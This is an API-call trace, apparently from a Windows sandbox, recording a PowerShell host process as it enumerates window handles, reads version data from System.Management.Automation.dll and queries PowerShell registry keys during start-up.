	[0065.257] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x830
	[0065.257] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x814
	[0065.257] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x744
	[0065.257] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x2a8
	[0065.257] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x534
	[0065.257] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x5e4
	[0065.258] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x5c4
	[0065.258] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x58c
	[0065.258] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x238
	[0065.258] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x584
	[0065.258] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x7e8
	[0065.258] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x678
	[0065.258] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x35c
	[0065.258] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x51c
	[0065.258] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x360
	[0065.258] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x274
	[0065.258] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x588
	[0065.258] GetWindowThreadProcessId (in: hWnd=0x20152, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0xc8
	[0065.259] GetWindowThreadProcessId (in: hWnd=0xa010a, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x21c
	[0065.259] GetWindowThreadProcessId (in: hWnd=0x3014e, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x5ec
	[0065.259] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x334
	[0065.259] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x664
	[0065.259] GetWindowThreadProcessId (in: hWnd=0x20138, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x334
	[0065.259] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x664
	[0065.259] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x334
	[0065.259] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x5ec
	[0065.259] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x5ec
	[0065.259] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x550
	[0065.259] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x7a0
	[0065.260] GetWindowThreadProcessId (in: hWnd=0x6009c, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x594
	[0065.260] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x564
	[0065.260] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x45c
	[0065.260] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x548
	[0065.260] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.260] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x518
	[0065.260] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.260] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.260] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.260] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x508
	[0065.260] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.260] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4ec
	[0065.261] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.261] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x45c
	[0065.261] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x45c
	[0065.261] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x44c
	[0065.261] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x7ec
	[0065.261] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x45c
	[0065.261] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x324
	[0065.261] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.261] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4a0
	[0065.261] GetWindowThreadProcessId (in: hWnd=0x701f2, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x854
	[0065.261] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x914
	[0065.262] GetWindowThreadProcessId (in: hWnd=0x2019e, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x914
	[0065.262] GetWindowThreadProcessId (in: hWnd=0x501f4, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x140
	[0065.262] GetWindowThreadProcessId (in: hWnd=0x30218, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x55c
	[0065.262] GetWindowThreadProcessId (in: hWnd=0x30222, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x34c
	[0065.262] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0xb40
	[0065.262] GetWindowThreadProcessId (in: hWnd=0x201f8, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x988
	[0065.262] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x868
	[0065.262] GetWindowThreadProcessId (in: hWnd=0x201ac, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x850
	[0065.262] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x830
	[0065.262] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x814
	[0065.262] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x744
	[0065.262] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x2a8
	[0065.263] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x534
	[0065.263] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x5e4
	[0065.263] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x5c4
	[0065.263] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x58c
	[0065.263] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x238
	[0065.263] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x584
	[0065.263] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x7e8
	[0065.263] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x678
	[0065.263] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x35c
	[0065.263] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x51c
	[0065.263] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x360
	[0065.264] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x274
	[0065.264] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x588
	[0065.264] GetWindowThreadProcessId (in: hWnd=0x80150, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0xc8
	[0065.264] GetWindowThreadProcessId (in: hWnd=0x400a0, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x21c
	[0065.264] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x664
	[0065.264] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x334
	[0065.264] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x5ec
	[0065.264] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x550
	[0065.264] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x7a0
	[0065.264] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x594
	[0065.264] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x45c
	[0065.264] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x508
	[0065.265] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x4ec
	[0065.265] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x45c
	[0065.265] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xbda90 | out: lpdwProcessId=0xbda90) returned 0x7ec
	[0065.297] WerSetFlags () returned 0x0
	[0065.461] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0065.461] CoTaskMemFree (pv=0x0) 
	[0065.462] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xbddf8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xbddf0 | out: pulNumLanguages=0xbddf8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xbddf0) returned 1
	[0065.462] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xbddf8, pwszLanguagesBuffer=0x2c1d6f0, pcchLanguagesBuffer=0xbddf0 | out: pulNumLanguages=0xbddf8, pwszLanguagesBuffer=0x2c1d6f0, pcchLanguagesBuffer=0xbddf0) returned 1
	[0065.467] CoTaskMemAlloc (cb=0x24) returned 0x39be20
	[0065.467] GetUserDefaultLocaleName (in: lpLocaleName=0x39be20, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0065.467] CoTaskMemFree (pv=0x39be20) 
	[0065.521] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0065.521] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.521] CoTaskMemFree (pv=0x2e4100) 
	[0065.522] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0065.522] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.522] CoTaskMemFree (pv=0x2e4100) 
	[0065.524] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0065.524] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.524] CoTaskMemFree (pv=0x2e4100) 
	[0065.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0065.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0065.534] SetErrorMode (uMode=0x1) returned 0x1
	[0065.534] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xbda70 | out: lpFileInformation=0xbda70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0065.534] SetErrorMode (uMode=0x1) returned 0x1
	[0065.534] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xbdce0 | out: lpdwHandle=0xbdce0) returned 0x94c
	[0065.536] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c20f80 | out: lpData=0x2c20f80) returned 1
	[0065.537] VerQueryValueW (in: pBlock=0x2c20f80, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xbdc58, puLen=0xbdc50 | out: lplpBuffer=0xbdc58*=0x2c2101c, puLen=0xbdc50) returned 1
	[0065.537] VerQueryValueW (in: pBlock=0x2c20f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xbdbc8, puLen=0xbdbc0 | out: lplpBuffer=0xbdbc8*=0x2c210f8, puLen=0xbdbc0) returned 1
	[0065.537] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0065.537] CoTaskMemAlloc (cb=0x2e) returned 0x3960b0
	[0065.537] lstrcpyW (in: lpString1=0x3960b0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0065.537] CoTaskMemFree (pv=0x3960b0) 
	[0065.537] VerQueryValueW (in: pBlock=0x2c20f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xbdbc8, puLen=0xbdbc0 | out: lplpBuffer=0xbdbc8*=0x2c2114c, puLen=0xbdbc0) returned 1
	[0065.537] lstrlenW (lpString="System.Management.Automation") returned 28
	[0065.537] CoTaskMemAlloc (cb=0x3c) returned 0x39ea90
	[0065.537] lstrcpyW (in: lpString1=0x39ea90, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0065.537] CoTaskMemFree (pv=0x39ea90) 
	[0065.537] VerQueryValueW (in: pBlock=0x2c20f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xbdbc8, puLen=0xbdbc0 | out: lplpBuffer=0xbdbc8*=0x2c211a8, puLen=0xbdbc0) returned 1
	[0065.537] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0065.537] CoTaskMemAlloc (cb=0x20) returned 0x39be80
	[0065.537] lstrcpyW (in: lpString1=0x39be80, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0065.537] CoTaskMemFree (pv=0x39be80) 
	[0065.537] VerQueryValueW (in: pBlock=0x2c20f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xbdbc8, puLen=0xbdbc0 | out: lplpBuffer=0xbdbc8*=0x2c211e8, puLen=0xbdbc0) returned 1
	[0065.538] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0065.538] CoTaskMemAlloc (cb=0x44) returned 0x39ea90
	[0065.538] lstrcpyW (in: lpString1=0x39ea90, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0065.538] CoTaskMemFree (pv=0x39ea90) 
	[0065.538] VerQueryValueW (in: pBlock=0x2c20f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xbdbc8, puLen=0xbdbc0 | out: lplpBuffer=0xbdbc8*=0x2c21250, puLen=0xbdbc0) returned 1
	[0065.538] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0065.538] CoTaskMemAlloc (cb=0x76) returned 0x32ad90
	[0065.538] lstrcpyW (in: lpString1=0x32ad90, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0065.538] CoTaskMemFree (pv=0x32ad90) 
	[0065.538] VerQueryValueW (in: pBlock=0x2c20f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xbdbc8, puLen=0xbdbc0 | out: lplpBuffer=0xbdbc8*=0x2c212ec, puLen=0xbdbc0) returned 1
	[0065.538] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0065.538] CoTaskMemAlloc (cb=0x44) returned 0x39ea90
	[0065.538] lstrcpyW (in: lpString1=0x39ea90, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0065.538] CoTaskMemFree (pv=0x39ea90) 
	[0065.538] VerQueryValueW (in: pBlock=0x2c20f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xbdbc8, puLen=0xbdbc0 | out: lplpBuffer=0xbdbc8*=0x2c21350, puLen=0xbdbc0) returned 1
	[0065.538] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0065.538] CoTaskMemAlloc (cb=0x58) returned 0x2ed430
	[0065.538] lstrcpyW (in: lpString1=0x2ed430, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0065.538] CoTaskMemFree (pv=0x2ed430) 
	[0065.538] VerQueryValueW (in: pBlock=0x2c20f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xbdbc8, puLen=0xbdbc0 | out: lplpBuffer=0xbdbc8*=0x2c213cc, puLen=0xbdbc0) returned 1
	[0065.538] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0065.538] CoTaskMemAlloc (cb=0x20) returned 0x39be80
	[0065.538] lstrcpyW (in: lpString1=0x39be80, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0065.538] CoTaskMemFree (pv=0x39be80) 
	[0065.538] VerQueryValueW (in: pBlock=0x2c20f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xbdbc8, puLen=0xbdbc0 | out: lplpBuffer=0xbdbc8*=0x2c21074, puLen=0xbdbc0) returned 1
	[0065.538] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0065.538] CoTaskMemAlloc (cb=0x66) returned 0x399e10
	[0065.538] lstrcpyW (in: lpString1=0x399e10, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0065.538] CoTaskMemFree (pv=0x399e10) 
	[0065.538] VerQueryValueW (in: pBlock=0x2c20f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xbdbc8, puLen=0xbdbc0 | out: lplpBuffer=0xbdbc8*=0x0, puLen=0xbdbc0) returned 0
	[0065.538] VerQueryValueW (in: pBlock=0x2c20f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xbdbc8, puLen=0xbdbc0 | out: lplpBuffer=0xbdbc8*=0x0, puLen=0xbdbc0) returned 0
	[0065.538] VerQueryValueW (in: pBlock=0x2c20f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xbdbc8, puLen=0xbdbc0 | out: lplpBuffer=0xbdbc8*=0x0, puLen=0xbdbc0) returned 0
	[0065.539] VerQueryValueW (in: pBlock=0x2c20f80, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xbdb98, puLen=0xbdb90 | out: lplpBuffer=0xbdb98*=0x2c2101c, puLen=0xbdb90) returned 1
	[0065.539] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0065.539] VerLanguageNameW (in: wLang=0x0, szLang=0x32d910, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0065.539] CoTaskMemFree (pv=0x32d910) 
	[0065.539] VerQueryValueW (in: pBlock=0x2c20f80, lpSubBlock="\\", lplpBuffer=0xbdbe8, puLen=0xbdbe0 | out: lplpBuffer=0xbdbe8*=0x2c20fa8, puLen=0xbdbe0) returned 1
	[0065.546] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0065.546] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.547] CoTaskMemFree (pv=0x2e4100) 
	[0065.658] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0065.658] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.658] CoTaskMemFree (pv=0x2e4100) 
	[0065.662] lstrlenW (lpString="䅁") returned 1
	[0065.671] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbdab8 | out: phkResult=0xbdab8*=0x304) returned 0x0
	[0065.672] RegOpenKeyExW (in: hKey=0x304, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xbdaa8 | out: phkResult=0xbdaa8*=0x308) returned 0x0
	[0065.673] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xbdb38 | out: phkResult=0xbdb38*=0x30c) returned 0x0
	[0065.678] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xbda7c, lpData=0x0, lpcbData=0xbda78*=0x0 | out: lpType=0xbda7c*=0x1, lpData=0x0, lpcbData=0xbda78*=0x56) returned 0x0
	[0065.679] CoTaskMemAlloc (cb=0x5a) returned 0x399da0
	[0065.679] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xbda4c, lpData=0x399da0, lpcbData=0xbda48*=0x56 | out: lpType=0xbda4c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xbda48*=0x56) returned 0x0
	[0065.679] CoTaskMemFree (pv=0x399da0) 
	[0065.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0065.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0065.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbd5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0065.811] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0065.811] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.811] CoTaskMemFree (pv=0x2e4100) 
	[0068.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xbd670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
